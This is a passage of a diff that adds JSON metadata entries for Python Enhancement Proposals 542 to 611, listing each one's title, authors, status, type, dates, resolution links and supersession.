"superseded_by": null, + "url": "https://peps.python.org/pep-0542/" + }, + "543": { + "number": 543, + "title": "A Unified TLS API for Python", + "authors": "Cory Benfield, Christian Heimes", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "17-Oct-2016", + "python_version": "3.7", + "post_history": "11-Jan-2017, 19-Jan-2017, 02-Feb-2017, 09-Feb-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "748", + "url": "https://peps.python.org/pep-0543/" + }, + "544": { + "number": 544, + "title": "Protocols: Structural subtyping (static duck typing)", + "authors": "Ivan Levkivskyi, Jukka Lehtosalo, \u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "05-Mar-2017", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0544/" + }, + "545": { + "number": 545, + "title": "Python Documentation Translations", + "authors": "Julien Palard, Inada Naoki, Victor Stinner", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "04-Mar-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-May/147957.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0545/" + }, + "546": { + "number": 546, + "title": "Backport ssl.MemoryBIO and 
ssl.SSLObject to Python 2.7", + "authors": "Victor Stinner, Cory Benfield", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-May-2017", + "python_version": "2.7", + "post_history": "23-May-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-June/148301.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0546/" + }, + "547": { + "number": 547, + "title": "Running extension modules using the -m option", + "authors": "Marcel Plch, Petr Viktorin", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "25-May-2017", + "python_version": "3.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0547/" + }, + "548": { + "number": 548, + "title": "More Flexible Loop Control", + "authors": "R David Murray", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.7", + "post_history": "05-Aug-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0548/" + }, + "549": { + "number": 549, + "title": "Instance Descriptors", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Sep-2017", + "python_version": "3.7", + "post_history": "04-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0549/" + }, + "550": { + "number": 550, + "title": "Execution Context", + "authors": "Yury Selivanov, Elvis Pranskevichus", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2017", + "python_version": "3.7", + "post_history": "11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017, 01-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0550/" + }, + "551": { + "number": 551, + "title": "Security transparency in the Python runtime", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "23-Aug-2017", + "python_version": "3.7", + "post_history": "24-Aug-2017, 28-Aug-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0551/" + }, + "552": { + "number": 552, + "title": "Deterministic pycs", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Sep-2017", + "python_version": "3.7", + "post_history": "07-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149649.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0552/" + }, + "553": { + "number": 553, + "title": "Built-in breakpoint()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.7", + "post_history": "05-Sep-2017, 07-Sep-2017, 13-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-October/149705.html", + 
"requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0553/" + }, + "554": { + "number": 554, + "title": "Multiple Interpreters in the Stdlib", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-554-multiple-interpreters-in-the-stdlib/24855", + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.13", + "post_history": "`07-Sep-2017 `__, `08-Sep-2017 `__, `13-Sep-2017 `__, `05-Dec-2017 `__, `04-May-2020 `__, `14-Mar-2023 `__, `01-Nov-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "734", + "url": "https://peps.python.org/pep-0554/" + }, + "555": { + "number": 555, + "title": "Context-local variables (contextvars)", + "authors": "Koos Zevenhoven", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-Sep-2017", + "python_version": "3.7", + "post_history": "06-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0555/" + }, + "556": { + "number": 556, + "title": "Threaded garbage collection", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "08-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0556/" + }, + "557": { + "number": 557, + "title": "Data Classes", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Jun-2017", + "python_version": "3.7", + "post_history": "08-Sep-2017, 25-Nov-2017, 30-Nov-2017, 01-Dec-2017, 02-Dec-2017, 06-Jan-2018, 04-Mar-2018", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151034.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0557/" + }, + "558": { + "number": 558, + "title": "Defined semantics for locals()", + "authors": "Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.13", + "post_history": "08-Sep-2017, 22-May-2019, 30-May-2019, 30-Dec-2019, 18-Jul-2021, 26-Aug-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0558/" + }, + "559": { + "number": 559, + "title": "Built-in noop()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149438.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0559/" + }, + "560": { + "number": 560, + "title": "Core support for typing module and generic types", + "authors": "Ivan Levkivskyi", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "03-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017, 14-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151038.html", + "requires": null, + 
"replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0560/" + }, + "561": { + "number": 561, + "title": "Distributing and Packaging Type Information", + "authors": "Ethan Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging, typing", + "created": "09-Sep-2017", + "python_version": "3.7", + "post_history": "10-Sep-2017, 12-Sep-2017, 06-Oct-2017, 26-Oct-2017, 12-Apr-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0561/" + }, + "562": { + "number": 562, + "title": "Module __getattr__ and __dir__", + "authors": "Ivan Levkivskyi", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151033.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0562/" + }, + "563": { + "number": 563, + "title": "Postponed Evaluation of Annotations", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Accepted", + "type": "Standards Track", + "topic": "typing", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "01-Nov-2017, 21-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151042.html", + "requires": null, + "replaces": null, + "superseded_by": "649", + "url": "https://peps.python.org/pep-0563/" + }, + "564": { + "number": 564, + "title": "Add new time functions with nanosecond resolution", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2017", + "python_version": "3.7", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-October/150046.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0564/" + }, + "565": { + "number": 565, + "title": "Show DeprecationWarning in __main__", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2017", + "python_version": "3.7", + "post_history": "12-Nov-2017, 25-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151224.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0565/" + }, + "566": { + "number": 566, + "title": "Metadata for Python Software Packages 2.1", + "authors": "Dustin Ingram", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "01-Dec-2017", + "python_version": "3.x", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-February/032014.html", + "requires": null, + "replaces": "345", + "superseded_by": null, + "url": "https://peps.python.org/pep-0566/" + }, + "567": { + "number": 567, + "title": "Context Variables", + "authors": "Yury Selivanov", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2017", + "python_version": "3.7", + "post_history": "12-Dec-2017, 28-Dec-2017, 16-Jan-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0567/" + }, + "568": { + "number": 568, + "title": "Generator-sensitivity for Context Variables", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0568/" + }, + "569": { + "number": 569, + "title": "Python 3.8 Release Schedule", + "authors": "\u0141ukasz Langa", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "27-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0569/" + }, + "570": { + "number": 570, + "title": "Python Positional-Only Parameters", + "authors": "Larry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele", + "discussions_to": "https://discuss.python.org/t/pep-570-python-positional-only-parameters/1078", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0570/" + }, + "571": { + "number": 571, + "title": "The manylinux2010 Platform Tag", + "authors": "Mark Williams, Geoffrey Thomas, Thomas Kluyver", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "05-Feb-2018", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-April/032156.html", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0571/" + }, + "572": { + "number": 572, + "title": "Assignment Expressions", + "authors": "Chris Angelico, Tim Peters, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Feb-2018", + "python_version": "3.8", + "post_history": "28-Feb-2018, 02-Mar-2018, 23-Mar-2018, 04-Apr-2018, 17-Apr-2018, 25-Apr-2018, 09-Jul-2018, 05-Aug-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2018-July/154601.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0572/" + }, + "573": { + "number": 573, + "title": "Module State Access from C Extension Methods", + "authors": "Petr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Jun-2016", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0573/" + }, + "574": { + "number": 574, + "title": "Pickle protocol 5 with out-of-band data", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Mar-2018", + "python_version": "3.8", + "post_history": "28-Mar-2018, 30-Apr-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-May/157284.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0574/" + 
}, + "575": { + "number": 575, + "title": "Unifying function/method classes", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "27-Mar-2018", + "python_version": "3.8", + "post_history": "31-Mar-2018, 12-Apr-2018, 27-Apr-2018, 05-May-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0575/" + }, + "576": { + "number": 576, + "title": "Rationalize Built-in function classes", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "10-May-2018", + "python_version": "3.8", + "post_history": "17-May-2018, 23-Jun-2018, 08-Jul-2018, 29-Mar-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0576/" + }, + "577": { + "number": 577, + "title": "Augmented Assignment Expressions", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "14-May-2018", + "python_version": "3.8", + "post_history": "22-May-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0577/" + }, + "578": { + "number": 578, + "title": "Python Runtime Audit Hooks", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Jun-2018", + "python_version": "3.8", + "post_history": "28-Mar-2019, 07-May-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0578/" + }, + "579": { + "number": 579, + "title": "Refactoring C functions and methods", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "04-Jun-2018", + "python_version": null, + "post_history": "20-Jun-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0579/" + }, + "580": { + "number": 580, + "title": "The C call protocol", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Jun-2018", + "python_version": "3.8", + "post_history": "20-Jun-2018, 22-Jun-2018, 16-Jul-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0580/" + }, + "581": { + "number": 581, + "title": "Using GitHub Issues for CPython", + "authors": "Mariatta", + "discussions_to": "https://discuss.python.org/t/535", + "status": "Final", + "type": "Process", + "topic": "", + "created": "20-Jun-2018", + "python_version": null, + "post_history": "07-Mar-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-May/157399.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0581/" + }, + "582": { + "number": 582, + "title": "Python local packages directory", + "authors": "Kushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-582-python-local-packages-directory/963/", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "16-May-2018", + "python_version": "3.12", + "post_history": "`01-Mar-2019 
`__,", + "resolution": "https://discuss.python.org/t/pep-582-python-local-packages-directory/963/430", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0582/" + }, + "583": { + "number": 583, + "title": "A Concurrency Memory Model for Python", + "authors": "Jeffrey Yasskin", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "22-Mar-2008", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0583/" + }, + "584": { + "number": 584, + "title": "Add Union Operators To dict", + "authors": "Steven D'Aprano, Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2019", + "python_version": "3.9", + "post_history": "01-Mar-2019, 16-Oct-2019, 02-Dec-2019, 04-Feb-2020, 17-Feb-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/6KT2KIOTYXMDCD2CCAOLOI7LUGTN6MBS", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0584/" + }, + "585": { + "number": 585, + "title": "Type Hinting Generics In Standard Collections", + "authors": "\u0141ukasz Langa", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "03-Mar-2019", + "python_version": "3.9", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/HW2NFOEMCVCTAFLBLC3V7MLM6ZNMKP42/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0585/" + }, + "586": { + "number": 586, + "title": "Literal Types", + "authors": "Michael Lee, Ivan Levkivskyi, Jukka Lehtosalo", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "14-Mar-2019", + "python_version": "3.8", + "post_history": "14-Mar-2019", + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0586/" + }, + "587": { + "number": 587, + "title": "Python Initialization Configuration", + "authors": "Victor Stinner, Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0587/" + }, + "588": { + "number": 588, + "title": "GitHub Issues Migration Plan", + "authors": "Mariatta", + "discussions_to": "https://discuss.python.org/t/13791", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "27-Mar-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0588/" + }, + "589": { + "number": 589, + "title": "TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys", + "authors": "Jukka Lehtosalo", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "20-Mar-2019", + "python_version": "3.8", + "post_history": null, + 
"resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0589/" + }, + "590": { + "number": 590, + "title": "Vectorcall: a fast calling protocol for CPython", + "authors": "Mark Shannon, Jeroen Demeyer", + "discussions_to": null, + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "29-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0590/" + }, + "591": { + "number": 591, + "title": "Adding a final qualifier to typing", + "authors": "Michael J. Sullivan, Ivan Levkivskyi", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "15-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0591/" + }, + "592": { + "number": 592, + "title": "Adding \"Yank\" Support to the Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/1629", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "07-May-2019", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-592-support-for-yanked-files-in-the-simple-repository-api/1629/30", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0592/" + }, + "593": { + "number": 593, + "title": "Flexible function and variable annotations", + "authors": "Till Varoquaux, Konstantin Kashin", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "26-Apr-2019", + "python_version": "3.9", + "post_history": "20-May-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0593/" + }, + "594": { + "number": 594, + "title": "Removing dead batteries from the standard library", + "authors": "Christian Heimes, Brett Cannon", + "discussions_to": "https://discuss.python.org/t/13508", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-May-2019", + "python_version": "3.11", + "post_history": "21-May-2019, 04-Feb-2022", + "resolution": "https://discuss.python.org/t/13508/22", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0594/" + }, + "595": { + "number": 595, + "title": "Improving bugs.python.org", + "authors": "Ezio Melotti, Berker Peksag", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "12-May-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0595/" + }, + "596": { + "number": 596, + "title": "Python 3.9 Release Schedule", + "authors": "\u0141ukasz Langa", + "discussions_to": "https://discuss.python.org/t/pep-596-python-3-9-release-schedule-doubling-the-release-cadence/1828", + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "04-Jun-2019", + 
"python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0596/" + }, + "597": { + "number": 597, + "title": "Add optional EncodingWarning", + "authors": "Inada Naoki", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2019", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0597/" + }, + "598": { + "number": 598, + "title": "Introducing incremental feature releases", + "authors": "Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-596-python-3-9-release-schedule-doubling-the-release-cadence/1828", + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "15-Jun-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0598/" + }, + "599": { + "number": 599, + "title": "The manylinux2014 Platform Tag", + "authors": "Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/the-next-manylinux-specification/1043", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "29-Apr-2019", + "python_version": null, + "post_history": "29-Apr-2019", + "resolution": "https://discuss.python.org/t/the-next-manylinux-specification/1043/199", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0599/" + }, + "600": { + "number": 600, + "title": "Future 'manylinux' Platform Tags for Portable Linux Built Distributions", + "authors": "Nathaniel J. 
Smith, Thomas Kluyver", + "discussions_to": "https://discuss.python.org/t/the-next-manylinux-specification/1043", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "03-May-2019", + "python_version": null, + "post_history": "03-May-2019", + "resolution": "https://discuss.python.org/t/pep-600-future-manylinux-platform-tags-for-portable-linux-built-distributions/2414/27", + "requires": null, + "replaces": "513, 571, 599", + "superseded_by": null, + "url": "https://peps.python.org/pep-0600/" + }, + "601": { + "number": 601, + "title": "Forbid return/break/continue breaking out of finally", + "authors": "Damien George, Batuhan Taskaya", + "discussions_to": "https://discuss.python.org/t/pep-601-forbid-return-break-continue-breaking-out-of-finally/2239", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2019", + "python_version": "3.8", + "post_history": "26-Aug-2019, 23-Sep-2019", + "resolution": "https://discuss.python.org/t/pep-601-forbid-return-break-continue-breaking-out-of-finally/2239/32", + "requires": null, + "replaces": null, + "superseded_by": "765", + "url": "https://peps.python.org/pep-0601/" + }, + "602": { + "number": 602, + "title": "Annual Release Cycle for Python", + "authors": "\u0141ukasz Langa", + "discussions_to": "https://discuss.python.org/t/pep-602-annual-release-cycle-for-python/2296/", + "status": "Active", + "type": "Process", + "topic": "", + "created": "04-Jun-2019", + "python_version": "3.9", + "post_history": "`09-Oct-2023 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/KE7OS4PZASZMFTW2FP2MWZU5R4Q2QZKU/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0602/" + }, + "603": { + "number": 603, + "title": "Adding a frozenmap type to collections", + "authors": "Yury Selivanov", + "discussions_to": "https://discuss.python.org/t/pep-603-adding-a-frozenmap-type-to-collections/2318/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "12-Sep-2019", + "python_version": null, + "post_history": "12-Sep-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0603/" + }, + "604": { + "number": 604, + "title": "Allow writing union types as ``X | Y``", + "authors": "Philippe PRADOS, Maggie Moss", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "28-Aug-2019", + "python_version": "3.10", + "post_history": "28-Aug-2019, 05-Aug-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0604/" + }, + "605": { + "number": 605, + "title": "A rolling feature release stream for CPython", + "authors": "Steve Dower, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-605-a-rolling-feature-release-stream-for-cpython/2418", + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "20-Sep-2019", + "python_version": "3.9", + "post_history": "01-Oct-2019, 06-Oct-2019, 20-Oct-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0605/" + }, + "606": { + "number": 606, + "title": "Python Compatibility Version", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": 
"18-Oct-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0606/" + }, + "607": { + "number": 607, + "title": "Reducing CPython's Feature Delivery Latency", + "authors": "\u0141ukasz Langa, Steve Dower, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-607-shared-background-for-the-release-cadence-peps/2528", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "11-Oct-2019", + "python_version": "3.9", + "post_history": "20-Oct-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0607/" + }, + "608": { + "number": 608, + "title": "Coordinated Python release", + "authors": "Miro Hron\u010dok, Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0608/" + }, + "609": { + "number": 609, + "title": "Python Packaging Authority (PyPA) Governance", + "authors": "Dustin Ingram, Pradyun Gedam, Sumana Harihareswara", + "discussions_to": "https://discuss.python.org/t/pep-609-pypa-governance/2619", + "status": "Active", + "type": "Process", + "topic": "governance, packaging", + "created": "05-Nov-2019", + "python_version": null, + "post_history": "05-Nov-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0609/" + }, + "610": { + "number": 610, + "title": "Recording the Direct URL Origin of installed distributions", + "authors": "St\u00e9phane Bidoul, Chris Jerdonek", + "discussions_to": "https://discuss.python.org/t/recording-the-source-url-of-an-installed-distribution/1535", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Apr-2019", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/1535/56", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0610/" + }, + "611": { + "number": 611, + "title": "The one million limit", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + 